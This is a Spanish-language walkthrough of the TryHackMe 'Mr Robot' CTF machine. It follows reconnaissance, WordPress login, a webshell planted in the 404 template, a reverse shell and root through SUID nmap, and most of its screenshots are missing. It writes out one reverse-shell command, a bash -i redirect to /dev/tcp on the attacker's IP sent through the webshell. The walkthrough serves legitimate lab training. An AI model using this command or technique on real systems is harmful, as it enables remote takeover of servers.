TryHackMe | Mr Robot CTF | Write up (#THM) by r1cky_r3x


Mr Robot CTF












Por
Rick Álvarez (aka r1cky_r3x)


Camino hacia el eJPTv2



.



Pre-Configuración TryHackMe






Nota: en ocasiones me sucede que estoy ejecutando cosas y la maquina se me queda colgada, entonces la termino y la vuelvo a iniciar con una nueva IP.


Reconocimiento

Ping, IP y SO: 



Enumeración

Quick Scan



Servicios y versiones (Targetted Ports):



Tenemos 3 puertos


Puerto 22

Nmap scripts



Puerto 80

Whatweb



Sitio web:


Fuzzing


Vamos a ejecutando el fuzzing pero iremos revisando recursos...

robots.txt

Tenemos 2 recursos, vamos a ver que onda...

fsocity.dic

Este archivo lo voy a guardar.


key-1-of-3.txt


/login


Tenemos un Wordpress, vamos a ejecutar wpscan para obtener mas información ...


... Seguia enumerando los recursos y ...

Woow, tranquilo viejo!


Vaya vaya!


Intentamos estas credenciales en wp

Estamos dentro!




Vulnerabilidades




Puerto 443




Explotación

Ya que estamos dentro, hay un truco que he visto mucho en otros CTFs...

Y trata de ir al Editor de "Appearance" para justamente cambiar el 404 Template.

Este recurso es el que se carga cuando no se encuentra un elemento en el sitio...

Vamos a editarlo y verlo en acción...

Damos en "Update File"

Y ahora si vamos a un recurso que no exista!

Ahora si, aquí viene la magia...

Hemos conseguido una webshell...


Vamos a entablarnos una reverseShell...

Me pongo en escucha con netcat:


Y ejecuto en el cliente web:

10.201.88.75/asdfasdfasdf?cmd=bash -c 'bash -i >%26 /dev/tcp/10.6.22.89/4343 0>%261'

Ejecutamos...

Y nada!

Por alguan razon que no entendí a pesar de intentar en inumerables ocasiones no pude obtener una shell reversa..

Lo que hice fue usar PHP PENTESTMONKEY de revshells.com y así fue que obtuve la revshell:


La copie totalmente en el editor 404 Template y guarde cambios, 

Ahora solo restaba ingresar a una url que no existia...



Y ahora si...


Estamos dentro!

Vamos a mejorar la shell, ya que esta espantosa!


Si tienes duda de como obtener una FULL TTY, te dejo como hacerlo aquí...


Ya que estamos dentro

Vamos por nuestra segunda flag...

Parece ser que solo robot puede leer la segunda flag... vamos a ver como cambiar de usuario o escalar privilegios...



Post Explotación

Vamos a buscar archivos que podamos leer...

Interesante!

Vamos a crackstation


Cambiamos de usuario:

Ahora si, podríamos ir por la segunda flag



Ahora si, faltaria solo 1 flag y escalar privilegios a root!


Vamos a enumerar un poco con este usuario...


SUDO



SUID

Vamos a revisar uno por uno para ver que encontramos...

...

Rápidamente vi el binario nmap...

El cual tiene el bit SUID activo... vamos a GTFOBINS...

 

Tenemos algunas opciones para intentar escalar privilegios ...

Boom bitch!

Somos root!

Vamos por nuestra esquisita flag...










Y de esta manera hemos conseguido pwnear la maquina de hoy!





Comentarios